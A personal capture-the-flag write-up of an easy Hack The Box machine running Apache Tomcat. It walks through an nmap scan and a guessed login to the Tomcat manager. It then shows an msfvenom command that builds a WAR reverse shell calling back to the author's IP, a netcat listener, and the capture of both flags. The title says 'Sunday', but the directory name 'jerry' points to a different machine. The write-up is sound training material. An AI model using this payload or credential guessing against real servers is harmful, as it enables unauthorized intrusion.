Hack The Box: Sunday machine write-up
This was my first attempt on a Windows machine and so I chose an easy machine, maybe too easy. It runs with ip 10.10.10.95.
We start by enumerating open ports to discover the services running in the machine. I ran the following:
Result of first nmap scan
1 2 3 4 5 6 7 8 9 10 11 12 # Nmap 7.01 scan initiated Mon Oct 8 10:22:18 2018 as: nmap -sV -sC -Pn -oA nmap/initial 10.10.10.95 Nmap scan report for 10.10.10.95 Host is up (0.036s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-favicon: Apache Tomcat |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache Tomcat/7.0.88 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Oct 8 10:22:33 2018 -- 1 IP address (1 host up) scanned in 14.38 seconds
I needed to use the
-Pn option to treat the host as online, otherwise nmap wouldn’t discover any ports.
So the only port open is 8080 for a web server. Let’s check it out!
Fresh installation page of apache tomcat
I knew for one of the previous boxes I had done that Tomcat has an online manager accesible, so I tried with
/manager and was prompted for a username and password. With a bit of luck I guessed it right:
Then we get in a control panel where a .WAR file can be uploaded. Looks like we found our entry point!
Control panel of apache tomcat
Option to upload a .WAR file
I used msfvenom to create a java reverse shell pointing to my IP address. Then I decompressed it to know what path to request in order to get my shell.
1 2 3 4 5 6 7 8 parallels@ubuntu:~/Desktop/jerry$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.13.200 LPORT=1234 -f war > reverse.war Payload size: 1102 bytes Final size of war file: 1102 bytes parallels@ubuntu:~/Desktop/jerry$ jar -xvf reverse.war created: WEB-INF/ inflated: WEB-INF/web.xml inflated: lmfuyxnlrwrnfg.jsp
With that I know that I have to make the following request to get the shell:
Before making the request, I used netcat to listen on the specified port, 1234. I used
nc -lnvp 1234. Once done, I visit the page and get a blank one but once I check I’ve got a reverse shell!
Reverse shell connection
Getting user and root
This was the most straightforward and easy machine I’ve done to get root and user. I started doing some manual enumeration when I found a path in the admin account that contained a file called
2 for the price of 1.txt. Yep, it contained both hashes…
Getting both hashes
Diego Bernal Adelantado